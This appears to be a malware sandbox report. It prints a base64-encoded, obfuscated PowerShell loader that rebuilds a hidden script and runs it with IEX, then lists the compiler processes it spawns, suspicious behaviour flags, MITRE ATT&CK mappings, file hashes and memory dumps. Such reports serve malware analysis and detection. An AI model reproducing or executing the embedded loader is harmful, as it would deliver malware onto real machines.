B0AGUAbABlACAAQgBpAHMAdABhAGkAQQBuAGkAbQBhAG4ARwBzAHQAZwBpAHQASABvAG4AbgByACAAcgBlAGEAZwBpAFMATgB1AG0AaQBuAGMARQBrAHMAdAByAHIAZQBuAHMAaAByAG8ASQBtAG0AbwByAGwAZQBsAGEAdABlAGwAUABvAGwAeQBjAEMARwByAGUAYQB0AG8AdQBkAG0AYQBhAG4AUABhAGEAawByAHMAZwBlAG4AZQByAG8AVQBuAGQAZQByAGwAUABsAHUAbQBhAGUAUwBjAGgAcgBlAFMATwB2AGkAbABsAGMAQgByAHUAZwBlAHIAQQBjAG8AbQBhAGUARwBlAGwAYQB0AGUATgBvAHIAdABoAG4AUwB2AGwAZwBlAEIATABpAG4AagBlAHUAQwByAG8AcwBzAGYAVwB5AHQAZQBkAGYAQgB5AGYAbwByAGUAQgBpAHQAbQBuAHIASQBuAHQAZQByACgASwBoAGkAcwAgAGkAdAByAGEAbgBzAG4ARAByAGEAawBvAHQAQwBpAHIAYwB1ACAARgByAGUAZABzAFUATwB2AGUAcgBiAGoAUwBpAG0AcABsAHYAUAByAG8AagBlAG4ASABlAHIAbwAgAGgAUAB1AGwAaQBzACwAUwBlAGUAYQBiAGkATQB1AG0AaQBlAG4AVgBvAGwAaQBlAHQAUgB1AG0AbQBsACAASwBvAG4AZgB1AFQAUwBrAGEAbABkAHIATQBpAGMAcgBvAHkAVAByAGkAdQBuAGsAUwBuAGkAdAB0AGsATQBlAHMAYQBsACwARwBlAG0AbQBlAGkAQQB1AHMAcABpAG4AVABpAGwAcwBrAHQATwB3AHMAZQAgACAAVQBuAGMAbwBuAEMAUAByAG8AZAB1AG8AVAByAHUAcwB0AGgARwBlAG4AZQByAGEAQgBlAHIAZwBnAGIAQgByAGUAZABuAGkAUwBhAGwAdABtACwASwBlAGwAbABpAGkATQBpAGQAZABsAG4AQgBlAHQAcwAgAHQAUgBvAG4AdABnACAAUgBlAGcAaQBvAEEAQQBiAGQAaQBjAG4AVQBuAG0AeQBzAHMAcwBsAGEAZwBpAGEARgBsAGoAZQB0AGUATQBpAHMAcwB1ACwAbAByAHIAZQBkAGkASwBvAGcAZQBrAG4AUABoAGEAZQBvAHQAcgByAGUAZABzACAAUwBsAGEAbQBiAFMAYQBmAHYAbgBuAHAAVgBlAGoAdgBzAGwAVQBuAGUAYwBsAGUAUwBvAGYAdABoACkAUgBlAGQAdQBjADsACgBDAGEAbQBlAHIAWwBTAGEAbQBmAHUARABVAG4AYQBsAGwAbABIAGEAbAB0AGUAbABQAGEAcwB0AGEASQBQAG8AbAB5AG0AbQBWAGcAdABrAGwAcABTAGsAbwB2AGwAbwB0AGEAbgBkAGgAcgBPAHIAZABrAGwAdABTAGwAdQB0AHQAKABrAHIAdQBkAHQAIgBKAGEAYgBvAHIAZwBQAGEAYQBuAHIAZABNAGEAdQBnAGkAaQBQAGEAcgBjAGUAMwBQAGUAbgBhAGwAMgBoAG8AcgBzAGUAIgBTAGUAYwBhAHQAKQBTAGEAbAB1AHQAXQBFAGwAaQB0AGUAcABNAG8AbgBvAHAAdQBiAGwAYQBjAGsAYgBTAGsAbwBuAG4AbABTAGUAbAB2AG8AaQBWAHIAZABpAGYAYwBIAHkAcABwAGUAIABSAGIAZABpAGcAcwBTAGsAcgBtAGIAdABvAG4AZABzAGsAYQBHAHUAdABzAGkAdABIAHkAcABzAGkAaQBUAGgAeQBtAG8AYwBTAHUAZQBuAHQAIABQAHIAagB1AGQAZQBOAG8AbgB2AGkAeABSAGUAYwB0AGEAdABDAG8AeABwAG8AZQBFAGYAdABlAHIAcgBlAHUAcAB5AHIAbgBEAHIAYQBjAGgAIABDAGgAYQByAHAAaQBQAGkAbgBuAGEAbgBGAHMAdABuAGUAdABVAG0AYQBhAGQAIABTAHQAYQB0AHUAQwBIAGEAbABzAGwAcgBVAG4AYwBvAGwAZQBlAG4AaAB5AHAAYQBjAGEAZgB0AGUAdABTAHQAZQB0AHMAZQBTAHQAZQBlAGwASQBqAG8AbQBmAHIAQwBTAGwAYQBnAGwAKABDAG8AZQBsAGEAaQBlAHgAYQBtAGkAbgBCAHIAaQBzAGEAdABBAG4AZwBpAHYAIABOAHkAYQBuAHMAQgBVAG4AZABpAHYAcgBOAGEAcgBhAG4AaQBTAGwAdAB0AGUAZABNAGkAbgBpAGsAZwBGAGQAZQBzAHQALABCAGoAZgBmAGUAaQBXAGkAZQByAGEAbgBRAHUAbwAgAFYAdABKAGUAYgBsAGkAIABGAGwAYQBzAGsARABjAGEAcgByAGkAcgBJAG4AdAByAG8AdQBPAGYAZgBlAG4AbgBGAGUAbQBrAG0AawBQAGgAZQBuAG8AZQBOAGEAdABpAG8ALABLAGUAcgBuAGUAaQBHAGkAYQBuAHQAbgBEAGEAZwBzAHAAdABMAGEAZwBlAG4AIABEAGEAdABlAHIARwBVAGUAZwBuAGUAcgBTAHkAbgBhAHIAdQBzAGUAbgB0AGkALABUAHIAawBwAGwAaQBLAHIAdQBkAHQAbgBQAHMAZQB1AGQAdABBAHAAYQByAHQAIABEAHkAcwB0AHIATABVAGQAZwBpAGYAeQBCAGUAbQB1AHoAbgBNAGkAbQBvAHMAZgBpAG4AdABlAHIAcgBPAHMAdABlAG8AKQBIAGUAbQBpAGMAOwAKAGUAZgB0AGUAcgBbAEwAYQBuAGQAdgBEAE4AZQBkAGsAbQBsAEIAYQBkAGUAbABsAEQAaQBzAHAAbABJAHMAbgB1AGQAZQBtAEYAbABpAHMAZQBwAFIAZQB2AGkAcwBvAFAAZQByAGEAYwByAEMAcgBlAGUAcAB0AEQAYQBnAHQAagAoAEcAbwBnAG8AcAAiAFUAZABzAHQAcgBrAEYAcgBlAG0AYgBlAG4AeQBzAGcAZQByAE4AaQBsAGcAYQBuAEIAYQBuAGEAbgBlAE4AbwBuAGQAZQBsAFAAaQByAG4AeQAzAFQAZQBsAGUAawAyAFIAaABlAHUAbQAiAFYAYQBnAG4AZQApAFQAaAByAGUAYQBdAE0AaQBkAGQAYQBwAFUAbgBkAGUAcgB1AEUAcwBzAGkAbgBiAE4AbwBuAHQAcgBsAFMAZQBtAGkAcwBpAEUAdAB5AG0AbwBjAEUAZwBlAHQAcgAgAEgAZQBsAGkAawBzAFQAaQBsAGwAYQB0AFAAdQBsAHMAbwBhAEEAZgBsAGUAZAB0AEIAbABnAGUAbABpAFAAcgBvAGcAcgBjAFUAdAByAHkAZwAgAFMAZQBrAHYAZQBlAFAAdQBsAHYAZQB4AEsAbABhAHAAcwB0AEkAcwBvAGwAYQBlAEcAYQBzAHQAcgByAFQAcgBpAG8AbABuAFYAdQBsAGcAYQAgAEgAbwB2AGUAZABpAFMAeQBuAGwAaQBuAEQAaQBzAGMAbwB0AFMAZQBnAG8AcwAgAEQAdQBjAGsAaQBHAFAAZQB0AGUAcgBlAHUAbgBkAGkAZgB0AEEAYwBlAHQAeQBDAEEAbQB1AHMAaQB1AHYAaQB2AGQAYQByAEUAbgB2AHkAIAByAFUAbgBnAHIAZQBlAEkAbABsAHUAcwBuAEUAawB2AGkAcAB0AE0AYQByAGsAZQBQAGIAbwBtAG0AZQByAEMAYQByAHIAaQBvAEEAYwBjAHIAZQBjAE4AZQBkAHQAcgBlAEIAZQBwAG8AdwBzAEEAbgB0AGkAYgBzAEYAbABlAG0AbQAoAFIAZQBlAGwAZQApAEgAZQBuAHMAeQA7AAoAQgB1AHMAaABlAFsATgB5AHMAawBhAEQASwByAGUAZABpAGwAQwBlAG4AdABlAGwARAB2AHIAZwBrAEkASQBuAHYAZQBuAG0AQwBvAGQAbwAgAHAATgBlAGQAaQBzAG8AVQBuAGMAaABlAHIAcAByAG8AcABvAHQARQBrAHMAcABvACgAawBhAHAAaQB0ACIAQQBhAHIAcwBvAGsAVABpAHQAdAB1AGUAUwB0AHUAbQBwAHIATABuAHIAYQBtAG4ATABpAGwAbABlAGUAQwByAGEAcABwAGwAVAB1AHIAYgBlADMAQQBwAGEAdABpADIAcwB0AGUAbABsACIARgByAGkAdABpACkAQgBpAHMAdABvAF0AQQB1AHQAZQBuAHAARABpAHMAYQBjAHUARQB4AHQAYQBuAGIAVQBuAG0AaQBuAGwATQB5AHMAdABlAGkAUwB0AGkAcABlAGMARwBlAG4AYQB2ACAATgBhAHIAYwBvAHMAUwB1AHAAZQByAHQATABlAGcAZQBwAGEARABtAHAAZQB0AHQARgBhAGwAYwBrAGkAQgBhAGcAZQBvAGMAUgBvAGMAaABlACAATQBpAHMAdgBpAGUATABpAG0AZQBkAHgAVAB1AG4AbgBlAHQAUwBwAG8AcgB0AGUASQBtAG0AaQB4AHIARgByAGUAbQBkAG4AUwBjAGgAbwBvACAAaABhAG0AbwB1AGkATQBpAHMAYwBvAG4AUwBuAG8AaABhAHQAYgBlAHQAaABlACAATQBvAHQAbwByAEcASQBuAGQAbABlAGUARQBuAGUAYQBuAHQARABlAGsAbwBtAFQATgBhAHYAbgBlAGUARgByAGUAbQB0AG0AVgBlAG4AaQAgAHAAUwB0AHIAYQB0AEYAUAB5AHQAdABlAGkASABhAHIAcAB1AGwASQBsAGwAaAB1AGUAUwBrAGEAbQBmAE4ATQBlAGQAaQBlAGEAUwBrAGkAZgB0AG0AVwBvAG8AbABzAGUAbABvAGMAdQBzACgARgBvAG8AegBsAGkAUABlAGEAcgBsAG4AUwBwAHIAbwBnAHQARgByAGkAZwByACAATQB1AHIAcgBlAEIARQBnAGUAbgBtAHUAVAByAGEAawB0AGQAQwBvAG0AZABlAGUASQBuAHQAZQByAG4ARAByAHUAbQBiAGUAVAByAGEAbgBzACwATQB1AGwAYwBoAGkASABvAHUAcwBlAG4AUwB0AGEAdgByAHQAUwBsAGEAZwBvACAAQgBhAHQAaABvAEgAQQByAGkAdABoAG8ARgBhAGQAcwBlAHYAYgBlAGEAcwB0AGUAUwBlAGEAcwAgAGQAYQBuAGkAbQBhADIAUABlAGEAYwBlADAAWgBvAGwAbwBzADMASwByAGkAYwBrACwAUwBvAGwAbwBpAGkAQwBvAHIAYQBuAG4ARwBhAHYAbAB0AHQAUABoAG8AbgBvACAAQwBvAGEAYgBvAFIAQQBsAGwAbwB0AG8AWgBpAG8AbgBpAHMAVAB1AGQAZQBoAGkAQgBlAGgAYQB2AG4ARwB1AG4AagBhAGQAUAByAGUAdABlADkAQgBhAHIAawBlACwAYwBvAG4AdABjAGkASAB5AHAAZQByAG4ASwBuAG8AZwBsAHQAQwB5AHQAbwB0ACAATQB5AGkAYQByAFQARQB0AGgAbAB5AHUATgByAGYAbwByAGwAQQBtAGUAbAB1AGwAQwBoAGEAbgBnAGUAQwBlAGMAaQBsACkAQQBzAGMAbwBnADsACgBTAHQAaQBsAG4AfQAKAEcAYQByAHIAbwAiAEQAaQBwAGwAbwBAAAoAUwB1AHAAcgBlACQARgBsAHUAYwB0AFYAUwBrAGIAbgBlAGkAVQBuAGIAYQBwAHIAVAByAGsAbgBpAGsARABhAGwAZQByAGUAUgBlAHMAdABhAGwAcABlAHIAcwBvADMAbgB5AHMAZwBlAD0ARwBhAGwAbgBpAFsAQgBvAG0AYgBlAFYAVAB1AG4AZwBtAGkAVwBpAGsAZQBuAHIAUwBoAGUAcABoAGsAQgByAGkAYQByAGUAVgBpAHQAcgBpAGwAUwB3ACAASwByADEATQBvAHQAbwBjAF0ATgBhAG4AYwBpADoAUwB1AHAAcAByADoARQBwAG8AawBlAFYAUABhAHAAaQBzAGkAVABpAG0AZQB3AHIARgBsAHkAcABlAHQATABpAHQAZQByAHUAQQB2AGUAZABlAGEARgBvAHIAagBhAGwARQBtAGUAdABpAEEAQgBhAGwAZAB5AGwATQBhAHQAZQByAGwAaABqAGUAbQBtAG8ATABlAGQAaQBnAGMAVgBhAGMAYQB0ACgASABvAHYAZQBkADAAUwBrAG8AdgBzACwARwBhAG0AbQB5ADEAVgBlAG4AaQBzADAAQQBmAGQAYQBtADQAVgBhAHIAbABpADgAUwB0AHkAcgBrADUAQgBlAHIAawBvADcAUwB0AGEAcwBpADYAQgByAGEAZABhACwARABlAHAAZQByADEAQgBvAHIAbgBlADIASwBlAHIAbgBlADIAUwBpAG4AcwBzADgAUABvAHQAbwBtADgAQQBkAHYAYQByACwAQgBsAGEAYQByADYARwB1AGYAIABFADQAUwBjAGgAdwBlACkACgBHAGwAYQBzAGUAJABOAG8AbgBwAGwATgBQAHIAYQBnAHQAYQBPAGMAYwBpAHAAdQBIAGUAaQBnAGgAcwBPAG4AZQBpAHIAZQBOAG8AbgB2AGEAYQBIAGEAbAB2AGQAbgByAGEAbQBtAGUAdABLAGEAcwBzAGUAdQBJAG4AcAB1AGwAPQBHAGwAYQBuAGQAKABaAGEAbgBlACAARwBBAG4AYQBnAGwAZQBIAG8AbQBlAGYAdABTAGYAYQBlAHIALQBDAG8AbgBzAHUASQBUAG8AeABhACAAdABVAGQAcwBrAGkAZQBHAHIAZQBlAGQAbQBTAGsAeQB0AGkAUABDAGEAcgBvAHQAcgBBAGYAcwB2AGEAbwBLAG8AawBsAGEAcABGAGwAbABlAHMAZQBDAG8AZQB0AGEAcgBCAG8AbQB1AGwAdABDAG8AYwBrAGYAeQBSAGEAawBlAHQAIABTAGEAbQBuAGkALQBLAHAAaABlAHMAUABGAHIAZQBtAGUAYQBGAGEAcgBuAGUAdABMAGEAbQBiAGEAaABCAG8AcgBnAGUAIABCAGwAdQBlAHkAIgBCAGUAcgBlAG4ASABDAG8AdQBwAGwASwBTAGsAYQBiAHMAQwBEAHkAcgBzAGsAVQBEAHUAYgBiAGkAOgBOAGUAZABhAGQAXABTAGwAdQB0AHMAUwBTAGUAbQBpAHIAbwBTAHAAcgBqAHQAZgBSAGkAbgBnAGUAdABTAG0AbwB2AHMAdwBVAG4AcAByAG8AYQBNAGUAdABhAHMAcgBTAHQAYQB2AGUAZQBIAGUAcwB0AGUAXABBAGEAbABlAHIAUwBQAHIAYQBlAGMAcABTAGsAaQBsAHMAbgBIAGUAcwBzAGUAZQBCAHIAbwBtAGkAbgBJAG4AdABlAHIAZABDAG8AbgBmAGkAIgBPAG4AYwBlAHMAKQBBAHMAaQBsAG8ALgBUAHIAawBpAHMAVQBoAGEAcgBwAHUAbgBCAGEAdABpAGsAcQBQAGEAcgBhAHQAdQBTAHUAYgBkAHIAZQBBAHQAaAB5AG0AcwBBAG4AbABnAHMAdABCAGEAZwBnAHIAaQAKAEYAbwByAHUAcgAkAFIAdQBkAGUAbABCAEIAdQBrAHMAZQBlAE4AZQB1AHIAbwBzAFUAbgBjAGkAYQBrAEMAbwBtAG0AbwAgAFMAcABpAHMAZQA9AEgAYQByAG0AbwAgAEEAZgBoAG4AZwBbAEcAcgBuAHMAZQBTAEEAcgBrAGEAZQB5AFQAZQBzAHQAZQBzAFAAdQBuAG4AaQB0AGYAbwByAGsAdABlAHIAZQB1AHAAbABtAE8AdABoAGUAcgAuAEMAaABsAG8AcgBDAFAAcgBpAG0AaQBvAEIAbABhAGQAZABuAEgAZQBsAGcAYQB2AEEAawB0AGkAbgBlAEgAZQBsAGYAcgByAFMAZQBtAGkAbwB0AE0AbwB2AGkAZQBdAFMAbABpAGQAcwA6AEIAaQBnAG4AbwA6AEEAbgBhAGwAZQBGAEgAZQBtAGkAcAByAEcAcgBpAG0AYQBvAHQAZQBsAGUAZgBtAEMAeQB0AG8AZABCAFYAYQBpAHIAZQBhAEQAZQBsAGkAdgBzAEsAdQBtAG0AZQBlAE8AcgBpAGUAbgA2AEMAbwBuAHMAaQA0AEgAagBoAGUAZABTAFAAcgBlAHQAcgB0AEYAdQBuAGcAaQByAFAAbABhAG4AdABpAEQAaQBwAGwAYQBuAFMAdQBwAGUAcgBnAHYAZQB4AGkAbAAoAFMAbgBvAHIAawAkAGQAZQBwAGEAcwBOAFMAdABlAHIAZQBhAEIAaQBvAGwAbwB1AFIAZQBhAG0AcwBzAHQAYQBnAHAAYQBlAEYAZQByAHIAZQBhAEUAbQBlAHIAcwBuAFIAaQB2AGEAbAB0AEYAaQBkAGcAZQB1AFMAcABhAGEAcgApAAoAQQBsAHQAZQByAFsAQwBoAGUAYwBrAFMARgBhAHkAaQBuAHkAUABpAG8AbgBlAHMATwBjAHQAYQBuAHQAVgBlAHMAdQB2AGUAVQBuAHMAcABpAG0ATQBpAGQAZABhAC4AVgBnAHQAZQByAFIAUwB0AGEAZwAgAHUAUABhAHUAcABlAG4AVQBuAGQAZQByAHQASQByAGsAcwBvAGkAUAByAG8AZgBhAG0AUgBlAHMAZQByAGUARgBqAGUAcgBuAC4AdABvAHIAbgB0AEkAVQBuAGQAZQByAG4ARgBvAHIAZQBwAHQAVQBuAG0AYQBuAGUAVABhAGIAbABlAHIAVABvAG4AaQBjAG8AUwB1AGQAYQBuAHAAcwB0AGUAbQBtAFMASABhAGkAbgBhAGUAQwBvAHUAbgB0AHIAVQBrAHIAdQBkAHYAZwBlAGIAcgBkAGkAQwBlAHIAYgBlAGMAQgByAHUAZwBlAGUARgBvAHIAdABqAHMARwBhAG8AbABlAC4AUgB1AG0AbQBlAE0AUABhAGwAdABlAGEARABlAGgAbwByAHIASABvAHIAbgBmAHMAbgBvAG4AbQBpAGgARgB1AHQAdQByAGEAUwBwAGwAYQB5AGwAVABvAHIAZABpAF0AUABsAGEAaQBzADoAQwBlAG4AdAByADoAQgBhAGMAaQBsAEMAcwBrAHIAdQBlAG8AVQBtAGIAcgBpAHAAUABlAG4AdABhAHkAVABoAGUAcgBtACgAdQBuAGQAZQByACQARABpAGEAZABvAEIAYgBsAGEAcwB0AGUARwB1AGQAZABvAHMAbABhAGcAcgBpAGsAUABvAHMAdAB0ACwATQBlAGQAaQBjACAAUwBsAHUAdABuADAAQwBlAGwAbABlACwAVQBuAHMAbwBsACAATABpAGwAbABlACAATQBpAGwAagBtACQAQQBwAG8AcwB0AFYAUwBrAGkAbABkAGkARAB1AGIAYgBlAHIAQgByAGkAcwB0AGsAUgBlAGYAbwByAGUAcwB5AG0AcAB0AGwAVQBkAGYAcgBzADMAUwBrAGkAYgBlACwAcABhAHIAaQB0ACAAdAByAGUAbQBwACQAQwBoAGkAYwBxAEIAVQBuAGkAcABsAGUASwBhAHQAYQBsAHMAUgBhAG4AcwBhAGsAVQBuAHIAbwBzAC4AUwBsAGEAbgBrAGMAUgBlAGkAdgBlAG8ARAB5AG4AYQBtAHUATQBlAGwAYQBkAG4AQgBsAGkAbgBkAHQASQBzAHQAaABtACkAUgBlAHAAcgBvADsACgBQAGgAcgBhAHQAWwBCAGUAdABhAHQAVgBBAGEAcgBlAG0AaQBBAG4AZwByAGUAcgBBAHAAbwBwAGwAawBWAGUAYwB0AG8AZQBTAHkAcwB0AG8AbABiAG8AbgB6AGUAMQBTAGUAZQBjAGgAXQBTAGwAYQBnAHQAOgBNAG8AcABlAHIAOgBUAGUAbQBzAGUARQBIAHUAbgBkAHIAbgBTAHQAcgBhAGYAdQBEAGkAYQBtAGEAbQBDAG8AYwBrAGIAUwBHAHIAYQB0AHUAeQBBAGIAdQBuAGUAcwBDAGEAdABlAGMAdABCAHIAbwBkAGUAZQBTAHAAcgBvAGcAbQBiAHIAdQBkAHMATABEAGcAbgBmAGwAbwBkAGUAcAByAGUAYwBmAGEAdgBlAGwAYQBGAG8AcgBiAHIAbABzAGUAcgBlAG4AZQBLAHIAeQBkAHMAcwBNAG8AcgBuAGUAQQBTAHkAcwB0AGUAKABNAGUAdABoAG8AJABVAG4AZgB1AHMAVgBFAGwAZQBjAHQAaQBrAGwAaQBuAGcAcgBTAHQAcgBhAG0AawBOAGkAawBrAGUAZQBPAGIAdgBlAHIAbABSAGUAcAByAG8AMwBBAGIAZABpAGEALABHAGgAbwBzAHQAIABFAGwAZQBjAHQAMABIAGkAbQBtAGUAKQBUAGEAbABvAGYAIwAKACcAQAANAAoADQAKAA0ACgBGAG8AcgAoACQAaQA9ADUAOwAgACQAaQAgAC0AbAB0ACAAJABEAGEAdgB5AGsAbABhAHAAcABlAC4ATABlAG4AZwB0AGgALQAxADsAIAAkAGkAKwA9ACgANQArADEAKQApAA0ACgB7AA0ACgAJAA0ACgAJACQARABpAGUAdABlAHIAcwBzAGEAIAA9ACAAJABEAGkAZQB0AGUAcgBzAHMAYQAgACsAIAAkAEQAYQB2AHkAawBsAGEAcABwAGUALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMQApAA0ACgAJAA0ACgAJAGkAZgAgACgAJABEAGEAdgB5AGsAbABhAHAAcABlAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkAKwAxACwAIAAxACkAIAAtAGUAcQAgACIAYABuACIAKQAgAHsADQAKAAkACQAkAEQAaQBlAHQAZQByAHMAcwBhACAAPQAgACQARABpAGUAdABlAHIAcwBzAGEAIAArACAAIgBgAG4AIgANAAoACQAJACQAaQAgAD0AIAAkAGkAIAArACAAMQANAAoACQB9ACAACQANAAoACQAJAA0ACgAJAA0ACgB9AA0ACgANAAoADQAKAEkARQBYACAAJABEAGkAZQB0AGUAcgBzAHMAYQANAAoA"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4956
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5iporioj\5iporioj.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:632
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES156C.tmp" "c:\Users\Admin\AppData\Local\Temp\5iporioj\CSCBABE24A1BBB4A84B87491544840F3CC.TMP"
      4⤵
      PID:1076

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5iporioj\5iporioj.dll

Filesize
4KB

MD5
9839815be6755a56921120fc991abc96

SHA1
21d8292426ac7f50ecd911920fc9d2ee2d007435

SHA256
addb9f1ab579262d58f7f441d221bca73e61f6e93563fd57327518fa50fd6f18

SHA512
5906d09894a3310b3df7f45a3eb98ce9c67771f99109cd2d49e9f29fa6f8c784b11a3447c4ab190890170cb2f1394e5c75c6b52d069c15e495b14afd2d024fa8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES156C.tmp

Filesize
1KB

MD5
fbe5cbdfe52fe28fdf780aab494e0add

SHA1
e9014bef4ac9ca4b7355bb5c520f9add51e8fafb

SHA256
c4ed35ac916397bdeefd9fd47afe3540c82d0c0d3efac829efea1d676260a73b

SHA512
848ebb7eb7f7619279056319386f69e603e4fd4264d0b2a24cec379f9b3d1d607f95fbc93d7cf9420627d8f3529de6b72dfc29672d4777f8dd2e472ba54b2062

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5iporioj\5iporioj.0.cs

Filesize
1KB

MD5
a32112efa20f4cea810ad1b41d7dd620

SHA1
c931b9918020ecad878104c98248dc9fc41e6e76

SHA256
931aafc6d353424a918670072b0163c0b7fb0fcf75711d4a54dc4892d2c6e428

SHA512
c9b40717eb9c8934f9e1ada66369e5f59fbff9f0735c7db92a5108d8252ec4f48023ae05553d8cf5ff0d8df4c560f784629f9be7015cb423b47a57ca62f2a584

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5iporioj\5iporioj.cmdline

Filesize
369B

MD5
c9d49a5b5eb281c1216195227b965dfb

SHA1
27697f5a33f93eb245d14f0b6df9cf10d60aab75

SHA256
22cf12eded145e47de8a5bce49acb6637974dd42b1c784a33f59d208685443d9

SHA512
04482932f7fde5e8d69d6d3298c57af0fe7ef99d727f43f238c88d076c953cf74294b7b1de517ba542072dc402e034d360273be21f7f76108ef81d9c67d0f68f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5iporioj\CSCBABE24A1BBB4A84B87491544840F3CC.TMP

Filesize
652B

MD5
0176d252dfc224049098bba66aa59208

SHA1
2bab84b22174a25e13c60bf813ef4be64adb8522

SHA256
bb23d92b7cfc80bc452fb52c12ec1083abf012914853c66d398d690620e806b0

SHA512
a563d015e588a305c714639212dbffd865bfed7f67a4b5d978aba0444d70c6630789a8098979c15557dc30cf0446df6fca655264f600a527f6fe46b1a627e57a

Download Submit
memory/632-141-0x0000000000000000-mapping.dmp

Download
memory/1076-144-0x0000000000000000-mapping.dmp

Download
memory/4956-140-0x0000000006EA0000-0x0000000006EBA000-memory.dmp

Filesize
104KB

Download
memory/4956-134-0x0000000005D60000-0x0000000006388000-memory.dmp

Filesize
6.2MB

Download
memory/4956-139-0x0000000008200000-0x000000000887A000-memory.dmp

Filesize
6.5MB

Download
memory/4956-132-0x0000000000000000-mapping.dmp

Download
memory/4956-135-0x0000000005B10000-0x0000000005B32000-memory.dmp

Filesize
136KB

Download
memory/4956-138-0x0000000006960000-0x000000000697E000-memory.dmp

Filesize
120KB

Download
memory/4956-137-0x0000000005C30000-0x0000000005C96000-memory.dmp

Filesize
408KB

Download
memory/4956-136-0x0000000005BC0000-0x0000000005C26000-memory.dmp

Filesize
408KB

Download
memory/4956-133-0x0000000003530000-0x0000000003566000-memory.dmp

Filesize
216KB

Download
memory/4956-148-0x0000000007D20000-0x0000000007DB6000-memory.dmp

Filesize
600KB

Download
memory/4956-149-0x0000000007CB0000-0x0000000007CD2000-memory.dmp

Filesize
136KB

Download
memory/4956-150-0x0000000008E30000-0x00000000093D4000-memory.dmp

Filesize
5.6MB

Download
memory/4956-151-0x0000000007B80000-0x00000000081FA000-memory.dmp

Filesize
6.5MB

Download
memory/4956-152-0x0000000007B80000-0x00000000081FA000-memory.dmp

Filesize
6.5MB

Download

Analysis

Sharing